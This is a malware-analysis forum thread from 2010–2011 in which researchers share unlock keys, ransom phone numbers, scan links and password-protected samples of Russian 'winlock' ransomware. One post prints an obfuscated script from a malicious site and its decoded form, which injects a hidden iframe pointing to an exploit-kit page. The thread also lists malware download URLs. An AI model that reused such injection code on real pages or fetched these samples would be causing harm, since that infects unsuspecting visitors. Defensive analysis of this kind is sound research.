A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #4155  by EP_X0FF
 Mon Dec 27, 2010 6:36 pm
Thanks.

Unblock key is DTLP

Image

Image

extracted winlock attached.

edit: added screenshots :)
Attachments
extracted winlock, pass: malware
(37.84 KiB) Downloaded 59 times
 #4312  by Xylitol
 Fri Jan 07, 2011 2:52 am
new pornoplayer

Image

@EP_X0FF: Sample from your link have evolved (lectfenu.narod.ru/xxx_video.exe)
Number to Call: 8-964-531-41-26 ~ 89645314126
unlock: 07090521

Image

this is why it's called 'Lock Em All':
Image
Attachments
see archive comment for the password
(23.93 KiB) Downloaded 59 times
see archive comment for the password
(32.24 KiB) Downloaded 55 times
 #4435  by EP_X0FF
 Thu Jan 13, 2011 1:23 pm
Soft updated. BlueTrash with some new way to store unblock key and several attempts to fool reversers. They even use SIMD (or it was before but I didn't mention it).

Unblock key DOUBLE DRAGON

Tel 89652538906

Image

In attach original dropper with reboot feature, unpacked and extracted winlock.

http://www.virustotal.com/file-scan/rep ... 1294925226
http://www.virustotal.com/file-scan/rep ... 1294925230
http://www.virustotal.com/file-scan/rep ... 1294925286
Attachments
pass: malware
(121.34 KiB) Downloaded 57 times
 #4457  by EP_X0FF
 Sat Jan 15, 2011 12:03 pm
BlueTrash updated.

Tell to call 8-906-079-49-26

Unblock key - BATTLE TOADS

http://www.virustotal.com/file-scan/rep ... 1295092661
http://www.virustotal.com/file-scan/rep ... 1295092531

Source hxxp://derodvix.info/3tu7dtt5v72227xtf1w61n6z2jxt129n/pornoplayer.exe
 #4470  by Xylitol
 Sun Jan 16, 2011 6:58 am
Gd guys video_XXXXXX.avi.exe again
https://www.virustotal.com/file-scan/re ... 1295149940
Image

edit: added unpacked sample
edit: homoblocker core added
Image
https://www.virustotal.com/file-scan/re ... 1295174505

Short HomoBlocker website analyze ~
Image

"fuck.js" contain:
Code: Select all
var _0x11f3=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x63\x6C\x65\x61\x72\x5F\x62\x6C\x6F\x63\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x2F\x6B\x61\x6C\x2F\x61\x6E\x65\x74\x64\x71\x79\x6F\x63\x75\x65\x76\x65\x6D\x63\x33\x2E\x70\x68\x70\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];document[_0x11f3[2]](_0x11f3[1])[_0x11f3[0]]=_0x11f3[3];
When deobfuscated:
Code: Select all
document['getElementById']('clear_block')['innerHTML'] = '<iframe src="/kal/anetdqyocuevemc3.php" width="1" height="1" scrolling="no" frameborder="0"></iframe>';
The "/kal/anetdqyocuevemc3.php" was a file from Phoenix Exploit Kit
Image

Image

Image
Attachments
see archive comment for password
(43.23 KiB) Downloaded 54 times
see archive comment for password
(27.19 KiB) Downloaded 52 times
see archive comment for password
(50.84 KiB) Downloaded 58 times
  • 1
  • 2
  • 3
  • 4
  • 5
  • 17